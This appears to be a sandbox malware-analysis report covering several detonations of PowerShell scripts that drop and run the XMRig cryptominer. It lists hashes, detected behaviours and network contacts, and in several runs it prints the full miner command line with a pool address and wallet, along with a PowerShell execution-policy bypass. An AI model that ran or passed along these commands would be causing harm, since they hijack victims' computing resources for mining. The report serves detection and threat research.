| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:47
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1787s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4812 wrote to memory of 4832 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4812 wrote to memory of 4832 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nlmlkoie.0nh.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:47
Platform
win10v2004-20240611-en
Max time kernel
1798s
Max time network
1782s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3664 wrote to memory of 2872 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3664 wrote to memory of 2872 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yrp2wff1.l3j.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral29
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 10:20
Platform
win7-20231129-en
Max time kernel
1559s
Max time network
1560s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
Network
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 10:00
Platform
win7-20240611-en
Max time kernel
1561s
Max time network
1562s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
Network
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:48
Platform
win11-20240611-en
Max time kernel
1798s
Max time network
1776s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4920 wrote to memory of 4900 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4920 wrote to memory of 4900 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 52.111.227.14:443 | N/A | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k5ftihad.czm.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral20
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:59
Platform
win11-20240611-en
Max time kernel
1790s
Max time network
1791s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1204 wrote to memory of 796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1204 wrote to memory of 796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ciytg2qu.n4o.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral5
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:47
Platform
win7-20231129-en
Max time kernel
1563s
Max time network
1564s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
Network
Files
memory/1276-4-0x000007FEF589E000-0x000007FEF589F000-memory.dmp
memory/1276-6-0x0000000002770000-0x0000000002778000-memory.dmp
memory/1276-5-0x000000001B590000-0x000000001B872000-memory.dmp
memory/1276-7-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
memory/1276-8-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
memory/1276-9-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
memory/1276-10-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
memory/1276-11-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
memory/1276-12-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:47
Platform
win10-20240611-en
Max time kernel
1794s
Max time network
1788s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5016 wrote to memory of 332 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5016 wrote to memory of 332 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.239.69.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
memory/5016-3-0x00007FFD3B4E0000-0x00007FFD3B6BB000-memory.dmp
memory/5016-5-0x00007FFD3B4E0000-0x00007FFD3B6BB000-memory.dmp
memory/5016-6-0x00007FFD3B4E0000-0x00007FFD3B6BB000-memory.dmp
memory/5016-7-0x0000022CB97A0000-0x0000022CB97C2000-memory.dmp
memory/5016-10-0x0000022CB9970000-0x0000022CB99E6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k0w2vads.551.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/5016-25-0x00007FFD3B4E0000-0x00007FFD3B6BB000-memory.dmp
memory/5016-48-0x0000022CB9B10000-0x0000022CB9B22000-memory.dmp
memory/5016-61-0x0000022CB97D0000-0x0000022CB97DA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/332-90-0x0000012072E50000-0x0000012072E70000-memory.dmp
memory/332-91-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/5016-92-0x00007FFD3B4E0000-0x00007FFD3B6BB000-memory.dmp
memory/332-93-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/5016-94-0x00007FFD3B4E0000-0x00007FFD3B6BB000-memory.dmp
memory/332-95-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-96-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-97-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-98-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-99-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-100-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-101-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-102-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-103-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-104-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-105-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-106-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-107-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-108-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-109-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-110-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-111-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-112-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-113-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-114-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-115-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-116-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-117-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-118-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-119-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-120-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-121-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-122-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-123-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-124-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-125-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-126-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-127-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-128-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-129-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-130-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-131-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-132-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-133-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-134-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-135-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-136-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-137-0x00007FF65F950000-0x00007FF660583000-memory.dmp
memory/332-138-0x00007FF65F950000-0x00007FF660583000-memory.dmp
